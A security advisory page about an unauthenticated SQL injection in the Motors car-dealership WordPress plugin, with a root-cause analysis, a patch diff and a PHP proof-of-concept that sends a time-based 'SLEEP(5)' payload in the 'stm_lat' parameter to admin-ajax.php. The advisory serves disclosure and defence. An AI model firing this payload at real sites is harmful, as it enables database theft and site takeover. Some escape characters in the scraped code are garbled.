Published : June 28, 2026

CVE-2026-54812: Motors – Car Dealership & Classified Listings Plugin <= 1.4.109 Unauthenticated SQL Injection PoC, Patch Analysis & Rule

CVE ID CVE-2026-54812

Plugin motors-car-dealership-classified-listings

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.4.109

Patched Version 1.4.110

Disclosed June 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-54812:

This vulnerability allows unauthenticated actors to perform SQL injection via the Motors – Car Dealership & Classified Listings Plugin for WordPress (versions up to 1.4.109). The critical flaw stems from insufficient input sanitization in location-based user queries, ultimately enabling an attacker to inject arbitrary SQL statements that can extract sensitive data from the database (CVSS 7.5).

Root Cause: The vulnerability originates in the `fields_by_location`, `join_by_location`, `having_by_location`, and `order_by_location` methods within `/includes/class/User/Model/UserModel.php`. These methods originally relied on `empty()` checks for latitude, longitude, and radius parameters. The `empty()` function returns true for zero or ‘0’, but it does not validate that the input contains a valid numeric or float format. This allowed non-numeric, malicious strings to pass through and be directly interpolated into the SQL query string (see `$formula` on line 196 and `HAVING distance <= $radius` on line 223). The user-supplied values arrive from the `UserController.php` via `apply_filters('stm_listings_input', null, 'stm_lat')` and related inputs, which previously did not enforce float validation.

Exploitation: An unauthenticated attacker can craft a GET or POST request to any endpoint that triggers the user listing or dealer search functionality (e.g., via AJAX or the front-end dealer list) and supply specially crafted values for `stm_lat`, `stm_lng`, or the radius parameter. For example, by passing `stm_lat=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a)` as a parameter, the unsanitized value reaches the SQL query. The attacker can then use time-based blind SQL injection or error-based techniques to enumerate database contents. Because the plugin does not require authentication for this search functionality, any visitor to the site can launch the attack.

Patch Analysis: The patch introduces two primary changes: (1) In `UserModel.php`, each method now uses `filter_var($lat, FILTER_VALIDATE_FLOAT)` before accepting the value. If validation fails, the method returns an empty string, preventing any SQL construction with the malicious input. The variables are also explicitly cast to `(float)`. (2) In `UserController.php`, the incoming parameters are now filtered through `filter_var(…, FILTER_VALIDATE_FLOAT)` before being passed to the model methods. The condition that triggers the location-based query was changed from `! empty( floatval( $lat ) )` to `false !== $lat && false !== $lng`, which properly checks that the filter succeeded. These changes ensure only numeric float values enter the SQL context, effectively neutralizing SQL injection attempts.

Impact: A successful exploit enables an unauthenticated attacker to read arbitrary data from the WordPress database. This includes user credentials (hashed passwords), email addresses, session tokens, post content, and sensitive configuration details. The attacker could obtain administrative credentials, leading to full site compromise. Additionally, the attacker might be able to leverage the database access to modify or delete existing data, or to inject malicious code into the site through stored procedures or other database features.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/motors-car-dealership-classified-listings/includes/actions.php
+++ b/motors-car-dealership-classified-listings/includes/actions.php
@@ -984,28 +984,80 @@

 		$response = array( 'status' => 'Error' );

-		$car_id = intval( filter_var( wp_unslash( $_POST['car_id'] ), FILTER_SANITIZE_NUMBER_INT ) );
-		$price  = floatval( filter_var( wp_unslash( $_POST['price'] ), FILTER_SANITIZE_NUMBER_FLOAT ) );
+		$car_id = isset( $_POST['car_id'] ) ? absint( wp_unslash( $_POST['car_id'] ) ) : 0;

-		if ( ! empty( $car_id ) && ! empty( $price ) ) {
+		if ( ! empty( $car_id ) && stm_is_listing_available_for_online_purchase( $car_id ) ) {
+			$price = stm_get_listing_online_purchase_price( $car_id );

-			update_post_meta( $car_id, '_price', $price );
-			update_post_meta( $car_id, 'is_sell_online_status', 'in_cart' );
+			if ( $price > 0 ) {
+				update_post_meta( $car_id, '_price', wc_format_decimal( $price ) );
+				update_post_meta( $car_id, 'is_sell_online_status', 'in_cart' );

-			$checkout_url = wc_get_checkout_url() . '?add-to-cart=' . $car_id;
+				$checkout_url = add_query_arg( 'add-to-cart', $car_id, wc_get_checkout_url() );

-			$response = array(
-				'status'       => 'success',
-				'redirect_url' => $checkout_url,
-			);
+				$response = array(
+					'status'       => 'success',
+					'redirect_url' => $checkout_url,
+				);

-			wp_send_json( $response );
+				wp_send_json( $response );
+			}
 		}

 		wp_send_json( $response );
 	}
 }

+if ( ! function_exists( 'stm_get_online_purchase_listing_post_types' ) ) {
+	function stm_get_online_purchase_listing_post_types() {
+		$post_types = array( apply_filters( 'stm_listings_post_type', 'listings' ) );
+
+		if ( class_exists( 'STMMultiListing' ) ) {
+			$slugs = STMMultiListing::stm_get_listing_type_slugs();
+
+			if ( ! empty( $slugs ) ) {
+				$post_types = array_merge( $post_types, $slugs );
+			}
+		}
+
+		return array_unique( array_filter( $post_types ) );
+	}
+}
+
+if ( ! function_exists( 'stm_is_listing_available_for_online_purchase' ) ) {
+	function stm_is_listing_available_for_online_purchase( $listing_id ) {
+		if ( ! in_array( get_post_type( $listing_id ), stm_get_online_purchase_listing_post_types(), true ) ) {
+			return false;
+		}
+
+		if ( 'publish' !== get_post_status( $listing_id ) ) {
+			return false;
+		}
+
+		if ( empty( get_post_meta( $listing_id, 'car_mark_woo_online', true ) ) ) {
+			return false;
+		}
+
+		if ( ! empty( get_post_meta( $listing_id, 'car_mark_as_sold', true ) ) ) {
+			return false;
+		}
+
+		return true;
+	}
+}
+
+if ( ! function_exists( 'stm_get_listing_online_purchase_price' ) ) {
+	function stm_get_listing_online_purchase_price( $listing_id ) {
+		$price = get_post_meta( $listing_id, 'sale_price', true );
+
+		if ( empty( $price ) ) {
+			$price = get_post_meta( $listing_id, 'price', true );
+		}
+
+		return (float) wc_format_decimal( $price );
+	}
+}
+
 //Trade in form ajax
 if ( ! function_exists( 'handle_stm_trade_in_form' ) ) {
 	function handle_stm_trade_in_form() {
--- a/motors-car-dealership-classified-listings/includes/class/User/Model/UserModel.php
+++ b/motors-car-dealership-classified-listings/includes/class/User/Model/UserModel.php
@@ -191,9 +191,13 @@
 	}

 	public function fields_by_location( $lat, $lng ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) || false === filter_var( $lng, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}
+
+		$lat = (float) $lat;
+		$lng = (float) $lng;
+
 		$formula = "6378.137 * ACOS(COS(RADIANS(stm_lat_prefix.meta_value))
 			* COS(RADIANS($lat))
 			* COS(RADIANS(stm_lng_prefix.meta_value) - RADIANS($lng)) + SIN(RADIANS(stm_lat_prefix.meta_value))
@@ -203,7 +207,7 @@
 	}

 	public function join_by_location( $lat ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}
 		$join  = " JOIN $this->user_meta_table AS stm_lat_prefix ON (u.ID = stm_lat_prefix.user_id AND stm_lat_prefix.meta_key = 'stm_dealer_location_lat')";
@@ -213,15 +217,17 @@
 	}

 	public function having_by_location( $lat, $radius ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) || false === filter_var( $radius, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}

+		$radius = (float) $radius;
+
 		return "HAVING distance <= $radius";
 	}

 	public function order_by_location( $lat ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}

--- a/motors-car-dealership-classified-listings/includes/class/User/UserController.php
+++ b/motors-car-dealership-classified-listings/includes/class/User/UserController.php
@@ -64,12 +64,12 @@
 				}
 			}

-			$lat    = apply_filters( 'stm_listings_input', null, 'stm_lat' );
-			$lng    = apply_filters( 'stm_listings_input', null, 'stm_lng' );
-			$radius = apply_filters( 'motors_vl_get_nuxy_mod', '', 'distance_search' );
-			$radius = ( ! empty( $radius ) ) ? $radius : 5000;
+			$lat    = filter_var( apply_filters( 'stm_listings_input', null, 'stm_lat' ), FILTER_VALIDATE_FLOAT );
+			$lng    = filter_var( apply_filters( 'stm_listings_input', null, 'stm_lng' ), FILTER_VALIDATE_FLOAT );
+			$radius = filter_var( apply_filters( 'motors_vl_get_nuxy_mod', '', 'distance_search' ), FILTER_VALIDATE_FLOAT );
+			$radius = ( false !== $radius && $radius > 0 ) ? $radius : 5000;

-			if ( empty( $left_join ) && ! empty( floatval( $lat ) ) && ! empty( floatval( $lng ) ) ) {
+			if ( empty( $left_join ) && false !== $lat && false !== $lng ) {
 				$include_users = $model->get_filtered_users_by_location( $model->fields_by_location( $lat, $lng ), $model->join_by_location( $lat ), $model->having_by_location( $lat, $radius ), $model->order_by_location( $lat ) );
 			} elseif ( ! empty( $left_join ) && ! empty( $where ) ) {
 				$include_users = $model->get_filtered_users( $left_join, $where, $model->fields_by_location( $lat, $lng ), $model->join_by_location( $lat ), $model->having_by_location( $lat, $radius ), $model->order_by_location( $lat ) );
--- a/motors-car-dealership-classified-listings/includes/helpers.php
+++ b/motors-car-dealership-classified-listings/includes/helpers.php
@@ -1337,7 +1337,7 @@
 		$page = 'inventory';

 		if ( isset( $_GET['page'] ) ) {
-			$page = sanitize_text_field( $_GET['page'] );
+			$page = sanitize_key( wp_unslash( $_GET['page'] ) );
 		}

 		if ( ! empty( $_GET['my_favourites'] ) ) {
--- a/motors-car-dealership-classified-listings/includes/templates.php
+++ b/motors-car-dealership-classified-listings/includes/templates.php
@@ -15,6 +15,12 @@
 	$located = false;

 	foreach ( (array) $templates as $template ) {
+		if ( ! stm_listings_is_safe_template_path( $template ) ) {
+			continue;
+		}
+
+		$template = ltrim( str_replace( '\', '/', $template ), '/' );
+
 		if ( substr( $template, - 4 ) !== '.php' ) {
 			$template .= '.php';
 		}
@@ -26,12 +32,18 @@
 		}

 		if ( ! ( $located ) ) {
-			if ( file_exists( realpath( apply_filters( 'stm_listings_template_file', STM_LISTINGS_PATH, $template ) . '/templates/' . $template ) ) ) {
-				$located = realpath( apply_filters( 'stm_listings_template_file', STM_LISTINGS_PATH, $template ) . '/templates/' . $template );
+			$template_base = realpath( apply_filters( 'stm_listings_template_file', STM_LISTINGS_PATH, $template ) . '/templates' );
+
+			if ( $template_base ) {
+				$template_path = realpath( $template_base . '/' . $template );
+
+				if ( $template_path && 0 === strpos( $template_path, $template_base . DIRECTORY_SEPARATOR ) && file_exists( $template_path ) ) {
+					$located = $template_path;
+				}
 			}
 		}

-		if ( file_exists( $located ) ) {
+		if ( $located && file_exists( $located ) ) {
 			break;
 		}
 	}
@@ -40,6 +52,33 @@
 }

 /**
+ * Check that a requested template path cannot escape the listings template scope.
+ *
+ * @param mixed $template Template path.
+ *
+ * @return bool
+ */
+function stm_listings_is_safe_template_path( $template ) {
+	if ( ! is_string( $template ) || '' === $template || str_contains( $template, "" ) ) {
+		return false;
+	}
+
+	$template = str_replace( '\', '/', $template );
+
+	if ( preg_match( '#^[a-z][a-z0-9+.-]*://#i', $template ) || preg_match( '#^[a-z]:/#i', $template ) || 0 === strpos( $template, '//' ) ) {
+		return false;
+	}
+
+	foreach ( explode( '/', trim( $template, '/' ) ) as $path_part ) {
+		if ( '..' === $path_part ) {
+			return false;
+		}
+	}
+
+	return true;
+}
+
+/**
  * Load template
  *
  * @param $__template
@@ -47,7 +86,11 @@
  */
 function stm_listings_load_template( $__template, $__vars = array() ) {
 	extract( $__vars );
-	include stm_listings_locate_template( $__template );
+	$__located = stm_listings_locate_template( $__template );
+
+	if ( $__located ) {
+		include $__located;
+	}
 }

 add_action( 'stm_listings_load_template', 'stm_listings_load_template', 10, 2 );
--- a/motors-car-dealership-classified-listings/includes/vehicle_functions.php
+++ b/motors-car-dealership-classified-listings/includes/vehicle_functions.php
@@ -1611,12 +1611,10 @@
 		$user_id         = get_current_user_id();
 		$attachments_ids = ( isset( $_POST['attachments'] ) && ! empty( $attachments_ids ) ) ? array_map( 'sanitize_text_field', array_values( explode( ',', $_POST['attachments'] ) ) ) : array();

-		if ( ! empty( $post_id ) ) {
-			if ( ! empty( get_post_meta( $post_id, 'stm_car_user', true ) ) && intval( get_post_meta( $post_id, 'stm_car_user', true ) ) !== intval( $user_id ) ) {
-				/*User tries to add info to another car*/
-				wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
-				exit;
-			}
+		if ( ! empty( $post_id ) && ! stm_current_user_can_manage_listing_media( $post_id ) ) {
+			/*User tries to add info to another car*/
+			wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
+			exit;
 		}

 		$error    = true;
@@ -1756,7 +1754,6 @@
 	}

 	add_action( 'wp_ajax_stm_ajax_add_a_car_images', 'stm_ajax_add_a_car_images' );
-	add_action( 'wp_ajax_nopriv_stm_ajax_add_a_car_images', 'stm_ajax_add_a_car_images' );
 }

 if ( ! function_exists( 'stm_listing_images_cron_event_start' ) ) {
@@ -1807,18 +1804,80 @@

 add_action( 'stm_add_a_car_images_schedule', 'stm_add_a_car_images_schedule' );

+if ( ! function_exists( 'stm_add_a_car_listing_post_types' ) ) {
+	function stm_add_a_car_listing_post_types() {
+		$post_types = array( apply_filters( 'stm_listings_post_type', 'listings' ) );
+
+		if ( class_exists( 'STMMultiListing' ) ) {
+			$slugs = STMMultiListing::stm_get_listing_type_slugs();
+
+			if ( ! empty( $slugs ) ) {
+				$post_types = array_merge( $post_types, $slugs );
+			}
+		}
+
+		return array_unique( array_filter( $post_types ) );
+	}
+}
+
+if ( ! function_exists( 'stm_current_user_can_manage_listing_media' ) ) {
+	function stm_current_user_can_manage_listing_media( $post_id ) {
+		if ( ! is_user_logged_in() || empty( $post_id ) ) {
+			return false;
+		}
+
+		if ( ! in_array( get_post_type( $post_id ), stm_add_a_car_listing_post_types(), true ) ) {
+			return false;
+		}
+
+		if ( current_user_can( 'edit_post', $post_id ) ) {
+			return true;
+		}
+
+		$listing_user_id = absint( get_post_meta( $post_id, 'stm_car_user', true ) );
+
+		return $listing_user_id && absint( get_current_user_id() ) === $listing_user_id;
+	}
+}
+
+if ( ! function_exists( 'stm_filter_listing_media_attachments' ) ) {
+	function stm_filter_listing_media_attachments( $attachments_ids, $post_id ) {
+		$filtered = array();
+
+		foreach ( $attachments_ids as $position => $attachment_id ) {
+			$attachment_id = absint( $attachment_id );
+
+			if ( ! $attachment_id || 'attachment' !== get_post_type( $attachment_id ) || ! wp_attachment_is_image( $attachment_id ) ) {
+				continue;
+			}
+
+			$attachment_parent = absint( wp_get_post_parent_id( $attachment_id ) );
+
+			if ( absint( $post_id ) !== $attachment_parent && ! current_user_can( 'edit_post', $attachment_id ) ) {
+				continue;
+			}
+
+			$filtered[ sanitize_key( $position ) ] = $attachment_id;
+		}
+
+		return $filtered;
+	}
+}
+
 if ( ! function_exists( 'stm_ajax_add_a_car_media' ) ) {
 	/**
 	 * Car media
 	 */
 	function stm_ajax_add_a_car_media() {
+		check_ajax_referer( 'stm_security_nonce', 'security' );
+
 		if ( apply_filters( 'stm_site_demo_mode', false ) ) {
 			wp_send_json( array( 'message' => esc_html__( 'Site is on demo mode', 'stm_vehicles_listing' ) ) );
 			exit;
 		}

-		$redirect_type = ( isset( $_POST['redirect_type'] ) ) ? $_POST['redirect_type'] : '';
-		$post_id       = intval( $_POST['post_id'] );
+		$redirect_type = ( isset( $_POST['redirect_type'] ) ) ? sanitize_key( wp_unslash( $_POST['redirect_type'] ) ) : '';
+		$post_id       = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
 		if ( ! $post_id ) {
 			/*No id passed from first ajax Call?*/
 			wp_send_json( array( 'message' => esc_html__( 'Some error occurred, try again later', 'stm_vehicles_listing' ) ) );
@@ -1828,21 +1887,21 @@
 		$user_id  = get_current_user_id();
 		$updating = $post_id && get_post_meta( $post_id, 'is_listing_updating', true );

-		if ( ! empty( $post_id ) ) {
-			if ( ! empty( get_post_meta( $post_id, 'stm_car_user', true ) ) && intval( get_post_meta( $post_id, 'stm_car_user', true ) ) !== intval( $user_id ) ) {
-				/*User tries to add info to another car*/
-				wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
-				exit;
-			}
+		if ( ! stm_current_user_can_manage_listing_media( $post_id ) ) {
+			/*User tries to add info to another car*/
+			wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
+			exit;
 		}

 		$attachments_ids = array();
 		foreach ( $_POST as $get_media_keys => $get_media_values ) {
 			if ( strpos( $get_media_keys, 'media_position_' ) !== false ) {
-				$attachments_ids[ str_replace( 'media_position_', '', $get_media_keys ) ] = intval( $get_media_values );
+				$attachments_ids[ str_replace( 'media_position_', '', $get_media_keys ) ] = absint( $get_media_values );
 			}
 		}

+		$attachments_ids = stm_filter_listing_media_attachments( $attachments_ids, $post_id );
+
 		$response = array(
 			'message' => '',
 			'post'    => $post_id,
@@ -1862,7 +1921,7 @@
 		);
 		$_thumbnail_id       = get_post_thumbnail_id( $post_id );
 		if ( $_thumbnail_id ) {
-			$current_attachments = array_unique( (array) array_unshift( $current_attachments, $_thumbnail_id ), SORT_NUMERIC );
+			$current_attachments = array_unique( array_merge( array( $_thumbnail_id ), $current_attachments ), SORT_NUMERIC );
 		}

 		if ( ! empty( $current_attachments ) ) {
@@ -2002,7 +2061,6 @@
 	}

 	add_action( 'wp_ajax_stm_ajax_add_a_car_media', 'stm_ajax_add_a_car_media' );
-	add_action( 'wp_ajax_nopriv_stm_ajax_add_a_car_media', 'stm_ajax_add_a_car_media' );
 }

 if ( ! function_exists( 'stm_media_random_affix' ) ) {
--- a/motors-car-dealership-classified-listings/stm_vehicles_listing.php
+++ b/motors-car-dealership-classified-listings/stm_vehicles_listing.php
@@ -8,7 +8,7 @@
  * License: GNU General Public License v2 or later
  * License URI: http://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain: stm_vehicles_listing
- * Version: 1.4.109
+ * Version: 1.4.110
  */

 if ( ! defined( 'ABSPATH' ) ) {
@@ -50,7 +50,7 @@
 	define( 'STM_LISTINGS_URL', plugins_url( '', STM_LISTINGS_FILE ) );
 	define( 'STM_LISTINGS', 'stm_vehicles_listing' );
 	define( 'STM_THEME_V_NEED', '5.6.33' );
-	define( 'STM_LISTINGS_V', '1.4.109' );
+	define( 'STM_LISTINGS_V', '1.4.110' );
 	define( 'STM_LISTINGS_DB_VERSION', '1.0.0' );
 	define( 'STM_LISTINGS_IMAGES', STM_LISTINGS_URL . '/includes/admin/butterbean/images/' );
 }
--- a/motors-car-dealership-classified-listings/templates/user/private/user.php
+++ b/motors-car-dealership-classified-listings/templates/user/private/user.php
@@ -10,6 +10,19 @@

 $tpl = apply_filters( 'stm_account_current_page', '' );

+$allowed_private_pages = apply_filters(
+	'stm_user_private_allowed_pages',
+	array(
+		'inventory',
+		'favourite',
+		'settings',
+		'become-dealer',
+		'car-edit',
+		'password-recovery',
+	)
+);
+
+$tpl = sanitize_key( $tpl );

 ?>

@@ -33,18 +46,19 @@
 			<div class="col-md-9 col-sm-12">
 				<div class="stm-user-private-main">
 					<?php
-					if ( isset( $_GET['page'] ) ) {
-						if ( apply_filters( 'get_saved_searches_page', sanitize_text_field( $_GET['page'] ) ) === 'saved-searches' ) {
+					if ( isset( $_GET['page'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+						$page = sanitize_key( wp_unslash( $_GET['page'] ) );
+						if ( apply_filters( 'get_saved_searches_page', $page ) === 'saved-searches' ) {
 							do_action( 'load_saved_searches_page' );
-						} else {
-							do_action( 'stm_listings_load_template', $path . $_GET['page'], array( 'user_id' => $user_id ) );
+						} elseif ( in_array( $page, $allowed_private_pages, true ) ) {
+							do_action( 'stm_listings_load_template', $path . $page, array( 'user_id' => $user_id ) );
 						}
 					} else {
 						if ( 'become-dealer' === $tpl && apply_filters( 'mvl_is_addon_enabled', false, 'forms_editor' ) ) {
 							// Load FormsEditor template directly, same as legacy template
 							// Template will get variables from its own scope (Config, etc.)
 							do_action( 'stm_listings_load_template', 'addons/forms-editor/page/partials/forms/become-dealer', array() );
-						} else {
+						} elseif ( in_array( $tpl, $allowed_private_pages, true ) ) {
 							do_action( 'stm_listings_load_template', $path . $tpl, array( 'user_id' => $user_id ) );
 						}
 					}
--- a/motors-car-dealership-classified-listings/vendor/composer/installed.php
+++ b/motors-car-dealership-classified-listings/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'motors_vehicles_listing/plugin',
         'pretty_version' => 'dev-release',
         'version' => 'dev-release',
-        'reference' => 'd724753e86fcde174972faa023b00bc1c5513e6f',
+        'reference' => 'd8d629de91665cfcab1687b11cf9bcb664dc9ffb',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'motors_vehicles_listing/plugin' => array(
             'pretty_version' => 'dev-release',
             'version' => 'dev-release',
-            'reference' => 'd724753e86fcde174972faa023b00bc1c5513e6f',
+            'reference' => 'd8d629de91665cfcab1687b11cf9bcb664dc9ffb',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-54812 - Motors – Car Dealership & Classified Listings Plugin <= 1.4.109 - Unauthenticated SQL Injection

$target_url = 'http://example.com'; // Change this to the target WordPress site

// The vulnerable endpoint is any page that triggers the user/dealer search with location parameters.
// In many cases, this is the dealers list page or an AJAX handler.
// We will use a POST request to the plugin's AJAX endpoint.

$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Step 1: Determine the correct AJAX action (this may vary by theme; common actions include 'stm_listings_load' or similar)
// For demonstration, we assume the action is 'stm_listings_load' which triggers the user model search.
$action = 'stm_listings_load'; // You may need to adjust this

// Step 2: Craft a payload that performs a time-based SQL injection
// The vulnerable parameter is 'stm_lat' (latitude). We inject a conditional sleep.
$payload = "1 AND (SELECT 1 FROM (SELECT SLEEP(5))a)";

$post_data = array(
    'action'  => $action,
    'stm_lat' => $payload,
    'stm_lng' => 0,
    'radius'  => 100
);

echo "[+] Sending SQL injection payload to $ajax_urln";
echo "[+] Payload: stm_lat = $payloadn";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

$duration = $end_time - $start_time;

echo "[+] HTTP Response Code: $http_coden";
echo "[+] Response Time: " . round($duration, 2) . " secondsn";

if ($duration >= 5 && $duration < 10) {
    echo "[!] Vulnerability confirmed! The server slept for approximately $duration seconds.n";
    echo "[!] This indicates SQL injection is possible.n";
} else {
    echo "[-] No significant time delay detected; the site may be patched or the action may differ.n";
    echo "[-] Try adjusting the AJAX action or the target URL.n";
}

echo "[+] Response body (truncated): " . substr($response, 0, 500) . "n";

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations